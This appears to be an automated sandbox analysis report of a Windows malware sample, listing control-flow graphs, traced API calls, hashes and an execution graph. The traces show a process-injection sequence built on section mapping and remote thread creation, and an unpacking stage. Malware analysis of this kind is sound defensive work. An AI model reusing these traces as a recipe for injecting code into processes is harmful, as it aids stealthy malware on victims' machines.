                                                                                                                              control_flow_graph 325 401557 326 40155b-40156e call 401193 325->326 327 40154f-401554 325->327 330 401570 326->330 331 401573-401578 326->331 327->326 330->331 333 401898-4018a0 331->333 334 40157e-40158f 331->334 333->331 337 401595-4015be 334->337 338 401896-4018a5 334->338 337->338 348 4015c4-4015db NtDuplicateObject 337->348 341 4018b4 338->341 342 4018ab-4018b0 338->342 341->342 343 4018b7 341->343 342->343 344 4018c5 343->344 345 4018bc-4018e3 call 401193 343->345 344->345 348->338 350 4015e1-401605 NtCreateSection 348->350 352 401661-401687 NtCreateSection 350->352 353 401607-401628 NtMapViewOfSection 350->353 352->338 354 40168d-401691 352->354 353->352 356 40162a-401646 NtMapViewOfSection 353->356 354->338 358 401697-4016b8 NtMapViewOfSection 354->358 356->352 357 401648-40165e 356->357 357->352 358->338 360 4016be-4016da NtMapViewOfSection 358->360 360->338 363 4016e0 call 4016e5 360->363
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                              • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                                              • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                              • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 366 402f97-402fbb 367 402fc1-402fd9 366->367 368 4030ee-4030f3 366->368 367->368 369 402fdf-402ff0 367->369 370 402ff2-402ffb 369->370 371 403000-40300e 370->371 371->371 372 403010-403017 371->372 373 403039-403040 372->373 374 403019-403038 372->374 375 403062-403065 373->375 376 403042-403061 373->376 374->373 377 403067-40306a 375->377 378 40306e 375->378 376->375 377->378 379 40306c 377->379 378->370 380 403070-403075 378->380 379->380 380->368 381 403077-40307a 380->381 381->368 382 40307c-4030eb RtlCreateUserThread NtTerminateProcess 381->382 382->368
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1921587553-0
                                                                                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                              • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                              • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 63 6c003c-6c0047 64 6c004c-6c0263 call 6c0a3f call 6c0e0f call 6c0d90 VirtualAlloc 63->64 65 6c0049 63->65 80 6c028b-6c0292 64->80 81 6c0265-6c0289 call 6c0a69 64->81 65->64 83 6c02a1-6c02b0 80->83 85 6c02ce-6c03c2 VirtualProtect call 6c0cce call 6c0ce7 81->85 83->85 86 6c02b2-6c02cc 83->86 92 6c03d1-6c03e0 85->92 86->83 93 6c0439-6c04b8 VirtualFree 92->93 94 6c03e2-6c0437 call 6c0ce7 92->94 96 6c04be-6c04cd 93->96 97 6c05f4-6c05fe 93->97 94->92 99 6c04d3-6c04dd 96->99 100 6c077f-6c0789 97->100 101 6c0604-6c060d 97->101 99->97 104 6c04e3-6c0505 99->104 105 6c078b-6c07a3 100->105 106 6c07a6-6c07b0 100->106 101->100 102 6c0613-6c0637 101->102 107 6c063e-6c0648 102->107 117 6c0517-6c0520 104->117 118 6c0507-6c0515 104->118 105->106 108 6c086e-6c08be LoadLibraryA 106->108 109 6c07b6-6c07cb 106->109 107->100 111 6c064e-6c065a 107->111 116 6c08c7-6c08f9 108->116 110 6c07d2-6c07d5 109->110 113 6c0824-6c0833 110->113 114 6c07d7-6c07e0 110->114 111->100 115 6c0660-6c066a 111->115 123 6c0839-6c083c 113->123 120 6c07e4-6c0822 114->120 121 6c07e2 114->121 122 6c067a-6c0689 115->122 124 6c08fb-6c0901 116->124 125 6c0902-6c091d 116->125 119 6c0526-6c0547 117->119 118->119 126 6c054d-6c0550 119->126 120->110 121->113 127 6c068f-6c06b2 122->127 128 6c0750-6c077a 122->128 123->108 129 6c083e-6c0847 123->129 124->125 131 6c0556-6c056b 126->131 132 6c05e0-6c05ef 126->132 133 6c06ef-6c06fc 127->133 134 6c06b4-6c06ed 127->134 128->107 135 6c0849 129->135 136 6c084b-6c086c 129->136 137 6c056d 131->137 138 6c056f-6c057a 131->138 132->99 139 6c06fe-6c0748 133->139 140 6c074b 133->140 134->133 135->108 136->123 137->132 141 6c057c-6c0599 138->141 142 6c059b-6c05bb 138->142 139->140 140->122 147 6c05bd-6c05db 141->147 142->147 147->126
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006C024D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2024197978.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_6c0000_bsjhhuh.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                              • Instruction ID: a16ad12f4b347be2b0c0f4aa935509a1366d3d88948981c0025655a100cedf30
                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                              • Instruction Fuzzy Hash: F4525874A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB351DB30AE95DF14

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 365 419cc0-419e00 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00515FF0), ref: 00419D9F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,00420518), ref: 00419DDC
                                                                                                                              • VirtualProtect.KERNELBASE(00515E34,00515FEC,00000040,?), ref: 00419DFB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023966601.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_40b000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2099061454-3916222277
                                                                                                                              • Opcode ID: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
                                                                                                                              • Instruction ID: 9b101dc19ab9e509907a73f40bd9e615ad2773d8f65bdac5e4741cefec9585ad
                                                                                                                              • Opcode Fuzzy Hash: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
                                                                                                                              • Instruction Fuzzy Hash: 273164516187C4EAE311CB64FC087523AA2AF79704F448069A148877B3E7BE065ADB6E

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 383 6f0bbe-6f0bd7 384 6f0bd9-6f0bdb 383->384 385 6f0bdd 384->385 386 6f0be2-6f0bee CreateToolhelp32Snapshot 384->386 385->386 387 6f0bfe-6f0c0b Module32First 386->387 388 6f0bf0-6f0bf6 386->388 389 6f0c0d-6f0c0e call 6f087d 387->389 390 6f0c14-6f0c1c 387->390 388->387 395 6f0bf8-6f0bfc 388->395 393 6f0c13 389->393 393->390 395->384 395->387
                                                                                                                              APIs
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006F0BE6
                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 006F0C06
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2024314586.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_6ed000_bsjhhuh.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3833638111-0
                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                              • Instruction ID: b5840d7d0befb26be5f506f1671e3799b0082ddb7fde98c1e0496460662b33dc
                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                              • Instruction Fuzzy Hash: CEF0C2352003186FE7202BF49C8CBBEB2EEAF48329F100268E753921C1CA71EC458A60

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 396 6c0e0f-6c0e24 SetErrorMode * 2 397 6c0e2b-6c0e2c 396->397 398 6c0e26 396->398 398->397
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00000400,?,?,006C0223,?,?), ref: 006C0E19
                                                                                                                              • SetErrorMode.KERNELBASE(00000000,?,?,006C0223,?,?), ref: 006C0E1E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2024197978.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_6c0000_bsjhhuh.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                              • Instruction ID: 4685c5a770edda50dbe0b2dc837f552568978304271461a35dbeccacd63f79b3
                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                              • Instruction Fuzzy Hash: 97D01231145129B7D7003A94DC0DBDD7B1CDF09B62F008411FB0DD9180C770994046E5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 399 4018e6-40194b call 401193 Sleep call 40141f 413 40195a-4019a5 call 401193 399->413 414 40194d-401955 call 401514 399->414 414->413
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1885482327-0
                                                                                                                              • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                              • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                                              • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                              • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 428 401915-401918 429 4018c6-4018c7 428->429 430 40191a-40194b call 401193 Sleep call 40141f 428->430 432 4018d7 429->432 433 4018ce-4018e3 call 401193 429->433 442 40195a-4019a5 call 401193 430->442 443 40194d-401955 call 401514 430->443 432->433 443->442
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1885482327-0
                                                                                                                              • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                              • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                                              • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                              • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 457 4018f1-40194b call 401193 Sleep call 40141f 467 40195a-4019a5 call 401193 457->467 468 40194d-401955 call 401514 457->468 468->467
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1885482327-0
                                                                                                                              • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                              • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                                              • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                              • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 482 401912-40194b call 401193 Sleep call 40141f 493 40195a-4019a5 call 401193 482->493 494 40194d-401955 call 401514 482->494 494->493
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1885482327-0
                                                                                                                              • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                              • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                                              • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                              • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006F08CE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2024314586.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_6ed000_bsjhhuh.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                              • Instruction ID: b47846a8642f071178ea63709cd58429334002dfc4099a253824170d11bcb896
                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                              • Instruction Fuzzy Hash: A2113C79A00208EFDB01DF98C985E99BBF5AF08351F058094FA489B362E371EA50DF80
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1885482327-0
                                                                                                                              • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                              • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                                              • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                              • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                                                                              APIs
                                                                                                                              • LocalAlloc.KERNELBASE(00000000,00515FEC,0041A29B), ref: 00419C98
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023966601.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_40b000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocLocal
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3494564517-0
                                                                                                                              • Opcode ID: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
                                                                                                                              • Instruction ID: cdbbb9e7b83af8b631a1fc3647d71b0b27ee278e0583f88c42ef53277000976a
                                                                                                                              • Opcode Fuzzy Hash: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
                                                                                                                              • Instruction Fuzzy Hash: 26B092B8502600DBD2408B60EC48F953A68E398202F009260FA0085160E7700805AA10
                                                                                                                              APIs
                                                                                                                              • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00419F54
                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00419F6F
                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 00419F8E
                                                                                                                              • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00419F9D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023966601.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_40b000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4159173863-0
                                                                                                                              • Opcode ID: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
                                                                                                                              • Instruction ID: 1bf496f261d44d5874548456f00747c7bc808a18a7fb14915401555e76d5e561
                                                                                                                              • Opcode Fuzzy Hash: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
                                                                                                                              • Instruction Fuzzy Hash: BF018474600204EBE750EB65EC45BDA77A8E71C316F408076FA0997290DB745D88CB99
                                                                                                                              APIs
                                                                                                                              • BuildCommDCBW.KERNEL32(00000000,?), ref: 00419EB4
                                                                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00419EC6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023966601.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_40b000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                              • String ID: -
                                                                                                                              • API String ID: 2991353152-2547889144
                                                                                                                              • Opcode ID: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
                                                                                                                              • Instruction ID: 22d77843ece4753af1e14c452f6c8b6cfa0dc65cd9848c352101f40df5cd50f1
                                                                                                                              • Opcode Fuzzy Hash: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
                                                                                                                              • Instruction Fuzzy Hash: 58F02230908305A6DB20DF98D8907EF7FA5E708322F60022AE840A62C1C7384D86D3AA

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:6.6%
                                                                                                                              Dynamic/Decrypted Code Coverage:19.1%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:257
                                                                                                                              Total number of Limit Nodes:7
                                                                                                                              execution_graph 4846 40b000 4847 40b004 4846->4847 4850 40b03c 4847->4850 4853 40b784 RtlLeaveCriticalSection 4850->4853 4852 40b033 4853->4852 4764 403043 4765 40319a 4764->4765 4766 40306d 4764->4766 4766->4765 4767 403128 RtlCreateUserThread NtTerminateProcess 4766->4767 4767->4765 5023 419c86 5024 419c90 5023->5024 5025 419c40 SetPriorityClass 5024->5025 5026 419cad 5024->5026 5025->5024 5057 40b308 5058 40b374 GetConsoleOutputCP WideCharToMultiByte 5057->5058 5061 40b325 5057->5061 5059 40b39b WriteConsoleA 5058->5059 5064 40b33d 5058->5064 5059->5064 5060 40b333 5063 40b344 WriteConsoleW 5060->5063 5060->5064 5061->5060 5068 40b84a CreateFileA 5061->5068 5063->5064 5065 40b35a 5063->5065 5065->5064 5066 40b363 GetLastError 5065->5066 5066->5064 5067 40b36e 5066->5067 5067->5058 5068->5060 4854 40b20a 4855 40b20f 4854->4855 4856 40b21d 4855->4856 4858 40b7ab 4855->4858 4862 40b7b7 4858->4862 4860 40b801 RtlDeleteCriticalSection 4860->4862 4861 40b82c __fcloseall 4861->4856 4862->4860 4862->4861 4863 40b90d 4862->4863 4864 40b919 4863->4864 4866 40b92d 4864->4866 4871 40b22a 4864->4871 4866->4862 4872 40b23c 4871->4872 4873 40b25e RtlEnterCriticalSection 4871->4873 4872->4873 4874 40b244 4872->4874 4873->4874 4875 40b896 4874->4875 4876 40b8c6 __fileno __freebuf 4875->4876 4878 40b8aa 4875->4878 4876->4878 4882 40ba25 4876->4882 4879 40b981 4878->4879 4905 40b29d 4879->4905 4881 40b987 4881->4866 4883 40ba31 4882->4883 4884 40b6e4 ___lock_fhandle RtlEnterCriticalSection 4883->4884 4885 40ba39 4883->4885 4886 40baa9 4884->4886 4885->4878 4888 40babe 4886->4888 4890 40b989 4886->4890 4897 40bae8 4888->4897 4894 40b999 __lseeki64_nolock 4890->4894 4891 40b9ef 4900 40b5e7 4891->4900 4894->4891 4895 40b9d9 CloseHandle 4894->4895 4895->4891 4896 40b9e5 GetLastError 4895->4896 4896->4891 4904 40b784 RtlLeaveCriticalSection 4897->4904 4899 40baf0 4899->4885 4901 40b649 4900->4901 4902 40b5f8 4900->4902 4901->4888 4902->4901 4903 40b643 SetStdHandle 4902->4903 4903->4901 4904->4899 4906 40b2cd RtlLeaveCriticalSection 4905->4906 4907 40b2ae 4905->4907 4906->4881 4907->4906 4908 40b2b5 4907->4908 4908->4881 4939 4014cf 4940 4014d3 4939->4940 4941 401660 NtDuplicateObject 4940->4941 4950 401571 4940->4950 4942 40167d NtCreateSection 4941->4942 4941->4950 4943 4016a3 NtMapViewOfSection 4942->4943 4944 4016fd NtCreateSection 4942->4944 4943->4944 4945 4016c6 NtMapViewOfSection 4943->4945 4946 401729 4944->4946 4944->4950 4945->4944 4947 4016e4 4945->4947 4948 401733 NtMapViewOfSection 4946->4948 4946->4950 4947->4944 4949 40175a NtMapViewOfSection 4948->4949 4948->4950 4949->4950 4909 40b011 4910 40b016 4909->4910 4911 40b03c RtlLeaveCriticalSection 4910->4911 4912 40b033 4911->4912 5073 4015d5 5074 4015e4 5073->5074 5075 401660 NtDuplicateObject 5074->5075 5084 40177c 5074->5084 5076 40167d NtCreateSection 5075->5076 5075->5084 5077 4016a3 NtMapViewOfSection 5076->5077 5078 4016fd NtCreateSection 5076->5078 5077->5078 5079 4016c6 NtMapViewOfSection 5077->5079 5080 401729 5078->5080 5078->5084 5079->5078 